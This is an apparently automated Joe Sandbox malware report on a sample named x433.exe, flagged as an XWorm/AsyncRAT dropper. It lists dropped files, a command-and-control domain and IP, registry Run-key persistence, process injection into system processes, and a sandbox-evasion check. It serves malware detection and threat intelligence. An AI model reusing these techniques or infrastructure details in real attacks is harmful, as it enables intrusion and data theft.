                      LSASS Memory1
                      Account Discovery
                      Remote Desktop Protocol1
                      Screen Capture
                      2
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts21
                      Command and Scripting Interpreter
                      1
                      Scheduled Task/Job
                      1
                      Windows Service
                      3
                      Obfuscated Files or Information
                      Security Account Manager2
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Credential API Hooking
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      Scheduled Task/Job
                      21
                      Registry Run Keys / Startup Folder
                      713
                      Process Injection
                      1
                      Install Root Certificate
                      NTDS34
                      System Information Discovery
                      Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts2
                      Service Execution
                      Network Logon Script1
                      Scheduled Task/Job
                      32
                      Software Packing
                      LSA Secrets661
                      Security Software Discovery
                      SSHKeylogging12
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable Media1
                      PowerShell
                      RC Scripts21
                      Registry Run Keys / Startup Folder
                      1
                      DLL Side-Loading
                      Cached Domain Credentials2
                      Process Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      File Deletion
                      DCSync151
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
                      Rootkit
                      Proc Filesystem1
                      Application Window Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Masquerading
                      /etc/passwd and /etc/shadow1
                      System Owner/User Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      Modify Registry
                      Network Sniffing1
                      System Network Configuration Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd151
                      Virtualization/Sandbox Evasion
                      Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                      Access Token Manipulation
                      KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                      Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers713
                      Process Injection
                      GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                      Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                      Hidden Files and Directories
                      Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465714 Sample: x433.exe Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 49 session-chief.gl.at.ply.gg 2->49 51 ip-api.com 2->51 75 Snort IDS alert for network traffic 2->75 77 Found malware configuration 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 24 other signatures 2->81 8 x433.exe 4 2->8         started        12 powershell.exe 2 15 2->12         started        14 x4usb.exe 2->14         started        signatures3 process4 file5 39 C:\Users\user\AppData\Local\Temp\x4host.exe, PE32 8->39 dropped 41 C:\Users\user\AppData\...\x4Shellcode.exe, PE32 8->41 dropped 43 C:\Users\user\AppData\Local\...\x433.exe.log, CSV 8->43 dropped 83 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->83 16 x4host.exe 16 5 8->16         started        21 x4Shellcode.exe 1 1 8->21         started        85 Writes to foreign memory regions 12->85 87 Modifies the context of a thread in another process (thread injection) 12->87 89 Found suspicious powershell code related to unpacking or dynamic code loading 12->89 91 Injects a PE file into a foreign processes 12->91 23 dllhost.exe 1 12->23         started        25 conhost.exe 12->25         started        93 Antivirus detection for dropped file 14->93 95 Multi AV Scanner detection for dropped file 14->95 97 Machine Learning detection for dropped file 14->97 signatures6 process7 dnsIp8 45 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 16->45 47 session-chief.gl.at.ply.gg 147.185.221.20, 36125, 49731, 49732 SALSGIVERUS United States 16->47 37 C:\Users\user\AppData\Local\x4usb.exe, PE32 16->37 dropped 57 Antivirus detection for dropped file 16->57 59 Multi AV Scanner detection for dropped file 16->59 61 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 16->61 71 3 other signatures 16->71 63 Machine Learning detection for dropped file 21->63 65 Injects code into the Windows Explorer (explorer.exe) 23->65 67 Contains functionality to inject code into remote processes 23->67 69 Writes to foreign memory regions 23->69 73 3 other signatures 23->73 27 lsass.exe 23->27 injected 30 svchost.exe 23->30 injected 33 winlogon.exe 23->33 injected 35 30 other processes 23->35 file9 signatures10 process11 dnsIp12 99 Installs new ROOT certificates 27->99 101 Writes to foreign memory regions 27->101 53 192.168.2.10 unknown unknown 30->53 55 192.168.2.7 unknown unknown 30->55 signatures13

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      x433.exe76%ReversingLabsByteCode-MSIL.Trojan.XWormRAT
                      x433.exe100%AviraTR/Dropper.Gen
                      x433.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\x4Shellcode.exe100%AviraTR/Dropper.MSIL.Gen
                      C:\Users\user\AppData\Local\Temp\x4host.exe100%AviraHEUR/AGEN.1305769
                      C:\Users\user\AppData\Local\x4usb.exe100%AviraHEUR/AGEN.1305769
                      C:\Users\user\AppData\Local\Temp\x4Shellcode.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\x4host.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\x4usb.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\x4Shellcode.exe96%ReversingLabsWin32.Virus.Expiro
                      C:\Users\user\AppData\Local\Temp\x4host.exe92%ReversingLabsByteCode-MSIL.Trojan.AsyncRAT
                      C:\Users\user\AppData\Local\x4usb.exe92%ReversingLabsByteCode-MSIL.Trojan.AsyncRAT
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                      https://go.micro0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
                      http://schemas.micro0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      https://aka.ms/pscore680%URL Reputationsafe
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                      https://word.office.com0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/09/policy0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/wsdl/erties0%Avira URL Cloudsafe
                      https://go.microsoft.co0%Avira URL Cloudsafe
                      https://powerpoint.office.com3J0%Avira URL Cloudsafe
                      http://docs.oasis-open.org/ws-sx/ws-securitypolicy/2007020%Avira URL Cloudsafe
                      http://ocsp.msocsp.0%Avira URL Cloudsafe
                      https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq0%Avira URL Cloudsafe
                      https://github.com/Pester/Pester0%Avira URL Cloudsafe
                      https://powerpoint.office.com0%Avira URL Cloudsafe
                      https://outlook.comSRD1-0%Avira URL Cloudsafe
                      https://excel.office.comSRD1%0%Avira URL Cloudsafe
                      https://powerpoint.office.comSRD130%Avira URL Cloudsafe
                      session-chief.gl.at.ply.gg0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/07/securitypolicy0%Avira URL Cloudsafe
                      http://docs.oasis-open.org/ws-sx/ws-trust/2005120%Avira URL Cloudsafe
                      https://word.office.comSRD1#0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/wsdl/soap12/0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      session-chief.gl.at.ply.gg
                      147.185.221.20
                      truetrue
                        unknown
                        ip-api.com
                        208.95.112.1
                        truetrue
                          unknown
                          fp2e7a.wpc.phicdn.net
                          192.229.221.95
                          truefalse
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            session-chief.gl.at.ply.ggtrue
                            • Avira URL Cloud: safe
                            unknown
                            http://ip-api.com/line/?fields=hostingfalse
                            • URL Reputation: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1776860992.0000021FF3F15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://word.office.comsvchost.exe, 00000023.00000000.1892174406.0000020D262F8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3013226921.0000020D262F8000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1743582596.0000021FE3F2D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://go.microsoft.copowershell.exe, 00000003.00000002.1782623387.0000021FFC1A1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1743582596.0000021FE3F2D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://go.micropowershell.exe, 00000003.00000002.1743582596.0000021FE4E45000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://powerpoint.office.com3Jsvchost.exe, 00000023.00000002.3021733036.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://contoso.com/Licensepowershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://ocsp.msocsp.lsass.exe, 00000007.00000000.1744669291.00000202C03C5000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://contoso.com/Iconpowershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yqMicrosoft-Windows-PushNotification-Platform%4Operational.evtx.16.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://powerpoint.office.comsvchost.exe, 00000023.00000002.3021733036.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.microsvchost.exe, 00000011.00000000.1809587946.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1743582596.0000021FE3F2D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000007.00000000.1744095896.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2962697239.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://excel.office.comSRD1%svchost.exe, 00000023.00000002.3004729739.0000020D26029000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1889283300.0000020D25FD3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1890717083.0000020D260D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3000838222.0000020D25FD3000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://contoso.com/powershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1776860992.0000021FF3D70000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://powerpoint.office.comSRD13svchost.exe, 00000023.00000000.1891920360.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3022802035.0000020D265BD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893559438.0000020D265BD000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://outlook.comSRD1-svchost.exe, 00000023.00000000.1891920360.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://word.office.comSRD1#svchost.exe, 00000023.00000000.1891920360.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3021733036.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893472173.0000020D26583000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3020897864.0000020D2655D000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3011954167.0000020D262D3000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893764769.0000020D26643000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000023.00000000.1893396897.0000020D2655D000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://aka.ms/pscore68powershell.exe, 00000003.00000002.1743582596.0000021FE3D01000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000007.00000000.1744095896.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000002.2962697239.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000007.00000002.2961484034.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000007.00000000.1744064595.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namex433.exe, 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp, x4host.exe, 00000002.00000002.2967434276.0000000003181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1743582596.0000021FE3D01000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            208.95.112.1
                            ip-api.comUnited States
                            53334TUT-ASUStrue
                            147.185.221.20
                            session-chief.gl.at.ply.ggUnited States
                            12087SALSGIVERUStrue
                            IP
                            192.168.2.10
                            192.168.2.7
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1465714
                            Start date and time:2024-07-02 00:30:05 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 10m 3s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:10
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:33
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:x433.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@10/70@2/4
                            EGA Information:
                            • Successful, ratio: 90.9%
                            HCA Information:
                            • Successful, ratio: 89%
                            • Number of executed functions: 101
                            • Number of non-executed functions: 273
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                            • Excluded IPs from analysis (whitelisted): 20.190.159.68, 20.190.159.71, 20.190.159.64, 20.190.159.2, 40.126.31.69, 20.190.159.75, 20.190.159.4, 40.126.31.73
                            • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                            • Execution Graph export aborted for target x433.exe, PID 6576 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • VT rate limit hit for: x433.exe
                            TimeTypeDescription
                            18:31:01API Interceptor9x Sleep call for process: powershell.exe modified
                            18:31:04API Interceptor3400x Sleep call for process: x4host.exe modified
                            18:31:35API Interceptor259431x Sleep call for process: lsass.exe modified
                            18:31:35API Interceptor336160x Sleep call for process: winlogon.exe modified
                            18:31:36API Interceptor6929x Sleep call for process: svchost.exe modified
                            18:31:38API Interceptor318311x Sleep call for process: dwm.exe modified
                            18:31:49API Interceptor157x Sleep call for process: spoolsv.exe modified
                            18:31:56API Interceptor172x Sleep call for process: dllhost.exe modified
                            23:31:09AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run x4usb C:\Users\user\AppData\Local\x4usb.exe
                            23:31:17AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run x4usb C:\Users\user\AppData\Local\x4usb.exe
                            23:31:25AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4usb.lnk
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            208.95.112.1rinvoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • ip-api.com/line/?fields=hosting
                            rQuotation.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            8f5WsFcnTc.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            ZkqNrYh5cV.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            rQoutation.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • ip-api.com/line/?fields=hosting
                            v31TgVEtHi.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            yVtOz1fD5G.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            8w5wHh755H.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            001 Tech. Spec pdf.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            doc -scan file.exeGet hashmaliciousAgentTeslaBrowse
                            • ip-api.com/line/?fields=hosting
                            147.185.221.20fg}.exeGet hashmaliciousXWormBrowse
                              build.exeGet hashmaliciousRedLineBrowse
                                Ph58Rkdxor.exeGet hashmaliciousXWormBrowse
                                  4kvADqDmZ4.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                    Discord Tools.exeGet hashmaliciousXWormBrowse
                                      Image logger beta.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                        fart.exeGet hashmaliciousAsyncRAT, DcRat, Quasar, XWormBrowse
                                          fart.exeGet hashmaliciousAsyncRAT, DcRat, Quasar, XWormBrowse
                                            Shiba Genisis Loader.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                              ModStickInjectorV1.exeGet hashmaliciousAsyncRAT, DcRat, Quasar, XWormBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ip-api.comrinvoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 208.95.112.1
                                                rQuotation.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                8f5WsFcnTc.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                ZkqNrYh5cV.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                rQoutation.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 208.95.112.1
                                                v31TgVEtHi.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                yVtOz1fD5G.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                8w5wHh755H.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                001 Tech. Spec pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                doc -scan file.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                fp2e7a.wpc.phicdn.nethttp://pub-72f4175190054b068a6db1f116f55ca9.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                http://pub-5e86a1f01e5a4476812e4d108add0587.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                https://telegrambot-resolved.pages.dev/Get hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                https://nsfgrs03.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                • 192.229.221.95
                                                http://pub-49f7bdad3ae7458f8076aa4480203a8b.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                https://serviceca11he1pn0waa12.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                • 192.229.221.95
                                                http://excelonline.standard.us-east-1.oortech.com/Index.htmlGet hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                https://strangetype.shop/Get hashmaliciousUnknownBrowse
                                                • 192.229.221.95
                                                http://page-timefthrturtuj.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                • 192.229.221.95
                                                http://pub-b08cf417828946e7aaa1a51805e57275.r2.dev/adobe2024.htmlGet hashmaliciousHTMLPhisherBrowse
                                                • 192.229.221.95
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                SALSGIVERUSfg}.exeGet hashmaliciousXWormBrowse
                                                • 147.185.221.20
                                                build.exeGet hashmaliciousRedLineBrowse
                                                • 147.185.221.20
                                                bJLd0SUHfj.exeGet hashmaliciousUnknownBrowse
                                                • 147.185.221.18
                                                PGjIoaqfQY.exeGet hashmaliciousUnknownBrowse
                                                • 147.185.221.18
                                                V6363OW8Rh.exeGet hashmaliciousXWormBrowse
                                                • 147.185.221.18
                                                x6221haMsm.exeGet hashmaliciousUnknownBrowse
                                                • 147.185.221.18
                                                Ph58Rkdxor.exeGet hashmaliciousXWormBrowse
                                                • 147.185.221.20
                                                4kvADqDmZ4.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                • 147.185.221.20
                                                BviOG97ArX.elfGet hashmaliciousMirai, MoobotBrowse
                                                • 147.176.119.108
                                                a.exeGet hashmaliciousUnknownBrowse
                                                • 147.185.221.18
                                                TUT-ASUSrinvoice.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 208.95.112.1
                                                rQuotation.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                8f5WsFcnTc.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                ZkqNrYh5cV.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                rQoutation.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 208.95.112.1
                                                v31TgVEtHi.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                yVtOz1fD5G.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                8w5wHh755H.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                001 Tech. Spec pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                doc -scan file.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                No context
                                                No context
                                                Process:C:\Users\user\Desktop\x433.exe
                                                File Type:CSV text
                                                Category:dropped
                                                Size (bytes):654
                                                Entropy (8bit):5.380476433908377
                                                Encrypted:false
                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
